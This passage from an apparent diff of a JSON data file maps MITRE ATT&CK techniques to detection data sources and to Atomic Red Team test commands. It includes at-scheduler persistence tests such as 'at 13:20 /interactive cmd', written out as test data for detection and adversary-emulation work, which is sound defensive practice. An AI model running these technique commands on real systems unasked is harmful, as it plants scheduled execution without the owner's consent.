traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1053.001", + "command_list": [ + "echo \"#{at_command}\" | at now + 1 minute\n", + "echo \"echo Hello from Atomic Red Team\" | at #{time_spec}\n" + ], + "commands": [ + { + "command": "echo \"#{at_command}\" | at now + 1 minute\n", + "source": "atomics/T1053.001/T1053.001.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: At (Linux)" + }, + { + "command": "echo \"echo Hello from Atomic Red Team\" | at #{time_spec}\n", + "source": "atomics/T1053.001/T1053.001.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: At (Linux)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.001", + "display_name": "Scheduled Task/Job: At (Linux)", + "atomic_tests": [ + { + "name": "At - Schedule a 
job", + "auto_generated_guid": "7266d898-ac82-4ec0-97c7-436075d0d08e", + "description": "This test submits a command to be run in the future by the `at` daemon.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "time_spec": { + "description": "Time specification of when the command should run", + "type": "String", + "default": "now + 1 minute" + }, + "at_command": { + "description": "The command to be run", + "type": "String", + "default": "echo Hello from Atomic Red Team" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "The `at` and `atd` executables must exist in the PATH\n", + "prereq_command": "which at && which atd\n", + "get_prereq_command": "echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'\n" + }, + { + "description": "The `atd` daemon must be running\n", + "prereq_command": "systemctl status atd || service atd status\n", + "get_prereq_command": "echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": false, + "command": "echo \"#{at_command}\" | at #{time_spec}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, 
BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": 
"Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.002", + "command_list": [ + "at 13:20 /interactive cmd\n" + ], + "commands": [ + { + "command": "at 13:20 /interactive cmd\n", + "source": "atomics/T1053.002/T1053.002.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: At (Windows)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.002", + "display_name": "Scheduled Task/Job: At (Windows)", + "atomic_tests": [ + { + "name": "At.exe Scheduled task", + "auto_generated_guid": "4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8", + "description": "Executes cmd.exe\nNote: deprecated in Windows 8+\n\nUpon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": 
false, + "command": "at 13:20 /interactive cmd\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + 
"container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
